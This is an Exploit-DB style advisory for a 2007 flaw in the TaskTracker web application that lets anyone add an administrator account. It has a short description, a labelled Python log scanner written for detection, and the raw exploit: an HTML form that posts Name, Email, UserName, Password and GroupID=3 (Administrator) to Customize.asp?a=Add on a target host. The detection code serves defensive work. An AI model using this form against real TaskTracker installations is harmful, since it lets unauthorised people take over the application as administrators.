Vendor: TaskTracker
By: ajann
CVSS: 7.5 (HIGH)
Remote Code Execution
CWE:
Product Name: TaskTracker
Affected Version From: All versions of TaskTracker
Affected Version To: All versions of TaskTracker
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

TaskTracker All Version Remote Add Admin Exploit

This exploit allows an attacker to remotely add an admin user to the TaskTracker application. The vulnerability is in the Customize.asp file, reached through its 'Add' action (Customize.asp?a=Add). By submitting a specially crafted form to that URL with the Name, Email, UserName, Password and GroupID fields, an attacker can create a new admin user (GroupID 3, Administrator) with the desired credentials.

Mitigation:

Apply a patch or update to a non-vulnerable version of the TaskTracker application.
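
Detection: the following is an added example, not part of the original advisory or the Exploit-DB entry. It scans IIS W3C extended logs for POSTs to Customize.asp?a=Add whose Referer is missing or off-site, which is what a form hosted outside the application produces. The logged field set, host names and sample lines are constructed assumptions.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed sample in IIS W3C extended format (not real traffic; documentation IP ranges).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs-host cs(Referer)
2007-01-02 09:14:03 192.0.2.10 GET /tracker/Customize.asp - 200 tracker.example.test http://tracker.example.test/tracker/Default.asp
2007-01-02 09:14:40 192.0.2.10 POST /tracker/Customize.asp a=Add 302 tracker.example.test http://tracker.example.test/tracker/Customize.asp
2007-01-02 11:52:17 198.51.100.7 POST /tracker/Customize.asp a=Add 302 tracker.example.test -
2007-01-02 11:53:01 203.0.113.5 POST /tracker/customize.asp A=add 200 tracker.example.test http://other.example.net/form.html
2007-01-02 12:00:00 192.0.2.10 POST /tracker/Login.asp - 302 tracker.example.test http://tracker.example.test/tracker/Login.asp
"""

def parse_w3c(text):
    """Yield one dict per request line, keyed by the most recent #Fields header."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):  # skip truncated or malformed lines
                yield dict(zip(fields, values))

def is_add_user_post(rec):
    """True for a POST to Customize.asp with a=Add (matched case-insensitively)."""
    if rec.get("cs-method", "").upper() != "POST":
        return False
    if not rec.get("cs-uri-stem", "").lower().endswith("/customize.asp"):
        return False
    query = parse_qs(rec.get("cs-uri-query", "").lower())
    return "add" in query.get("a", [])

def referer_is_offsite(rec):
    """True when the Referer is absent or its host differs from the requested host."""
    ref = rec.get("cs(Referer)", "-")
    if ref == "-":
        return True
    site = rec.get("cs-host", "").lower().split(":")[0]
    return (urlsplit(ref).hostname or "") != site

def suspicious_add_requests(text):
    """Add-user POSTs that did not originate from the application's own pages."""
    return [r for r in parse_w3c(text) if is_add_user_post(r) and referer_is_offsite(r)]
```

Referer can be stripped or forged, so treat hits as triage leads and reconcile every a=Add POST against the application's user list; the POST body is not in W3C logs, so the GroupID chosen is not visible there.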
Source

Exploit-DB raw data:

<!--

*******************************************************************************
# Title   :  TaskTracker All Version Remote Add Admin Exploit
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.geckovich.com
# $$      :  $39.99 - $19.99

*******************************************************************************

-->

<FORM NAME="AddUser" METHOD="POST" ACTION="http://[target]/[path]/Customize.asp?a=Add" style="word-spacing: 0; margin-top: 0; margin-bottom: 0">
	<td valign=top class='data3'>
       	<input type=text size="1" name="Name" class=textboxes style='width:100; height:17; font-size: 10px;' VALUE="">
	</td>
	<td valign=top class='data3'>
		<input type=text size="1" name="Email" class=textboxes style='width:200; height:17; font-size: 10px;' VALUE="">
	</td>
	<td valign=top class='data3'>
		<input type=text size="1" name="UserName" class=textboxes style='width:100; height:17; font-size: 10px;' VALUE="">

	</td>
	<td valign=top class='data3'>
		<input type=text size="1" name="Password" class=textboxes style='width:100; height:17; font-size: 10px;' VALUE="">
	</td>
	<td valign=top class='data3'>
		<select name="GroupID" class="selectedtextboxes">
			<option value="1">Publisher</option>
			<option value="2">Editor</option>

			<option value="3">Administrator</option>
		</select>
	</td>
	<td valign=middle class='data3' align="center" colspan="2" align="center">
    	<input type="submit" value="Gonder">
    	</form>

# milw0rm.com [2007-01-01]